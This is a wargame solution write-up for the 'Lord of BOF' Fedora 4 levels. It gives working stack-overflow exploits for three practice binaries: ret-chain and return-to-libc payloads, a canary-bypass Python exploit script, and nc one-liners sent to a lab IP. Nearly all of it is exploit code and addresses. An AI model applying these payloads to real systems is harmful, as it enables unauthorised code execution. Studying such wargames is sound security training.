[Lord Of Bof] Lord Of BOF Solutions ( Fedora 4 )

Solutions

Level 1

- up-upgraded simple buffer overflow 

; no more fake ebp ; random library
; like FC3 level1 prob, use ret to ret for escaping random stack
; when using 12 ret, execve's argv of 2 is null
; ret address : 0x08048451
; execve address : 0x00832abc
; for file name : 85 c0 75 53 65 a1 54
; payload : ln -s ./shell $(echo -en "\x85\xc0\x75\x53\x65\xa1\x54")
                 ./cruel $(python -c 'print "A"*260 + "\x51\x84\x04\x08"*12  + "\xbc\x2a\x83\x00"')

Level 2

- canary + remote exploit + there's no NULL byte accepted + cleaning buffer + stdin

; stdin's address is changing every running, but it changes between 0xb7f00000 ~ 0xb7fff000 ; so we need to brute-force, maybe.. if it needs
; if you need to use shellcode on stdin buffer, mprotect is needed ; but i don't want to make my payload long ~
; 
; canary value : 0x31337; 
; execve address : 0x00832abc
; stdin address : 0xb7f
; leaveret address : 0x0804858e

; payload : while [ 1 ]; do (python ./exploit.py ; cat) | nc 192.168.254.131 7777; done

from socket import *
from struct import *

p = lambda x : pack('<I', x)

canary = 0x31337
stdin = 0xb7fc9000
execve = 0x00832abc
leaveret = 0x0804858e

payload = "A"*260
payload += p(stdin+0x110)
payload += p(leaveret)
payload += p(canary)
payload += p(stdin+0x10c)
payload += p(execve)
payload += "A"*4
payload += p(stdin+0x128)
payload += p(stdin+0x130)
payload += p(0x00)
payload += "/bin/sh\x00"
payload += p(stdin+0x130)
payload += p(0x00)

print payload

Level 3

- Remote exploit + small buffer than before + stdin + can't use buffer + RTL is prevented at ret

; static function ftn() ; 48 byte to 40 byte -> buffer overfow
; we can control on;y 4byte ; ftn ~ ftn+3 
; This time, code reuse attack is what i use ; simply say, using 
; 
; system address :  0x007db0e7
; /bin/sh address : 0x008bd987
; add esp address : 0x0804854a
   
; payload : (python -c 'print "A"*40 + ("\x4a\x85\x04\x08" + "A"*3)*4 + ("A"*8 + "\xe7\xb0\x7d\x00" + "\x84\x08\x7d\x00" + "\x87\xd9\x8b\x00")'; cat) | nc 192.168.254.131 8888

ALL CLEAR!

[titan@Fedora_2ndFloor ~]$ ls
dropped_item.txt
[titan@Fedora_2ndFloor ~]$ cat ./*
                   ,.
                 ,'  `.
               ,' _<>_ `.
             ,'.-'____`-.`.
           ,'_.-''    ``-._`.
         ,','      /\      `.`.
       ,' /.._  O /  \ O  _.,\ `.
     ,'/ /  \ ``-;.--.:-'' /  \ \`.
   ,' : :    \  /\`.,'/\  /    : : `.
  < <>| |   O >(< (  ) >)< O   | |<> >
   `. : :    /  \/,'`.\/  \    ; ; ,'
     `.\ \  /_..-:`--';-.._\  / /,'
       `. \`'   O \  / O   `'/ ,'
         `.`._     \/     _,','
           `..``-.____.-'',,'
             `.`-.____.-','
               `.  <>  ,'
                 `.  ,' 
                   `'
[titan@Fedora_2ndFloor ~]$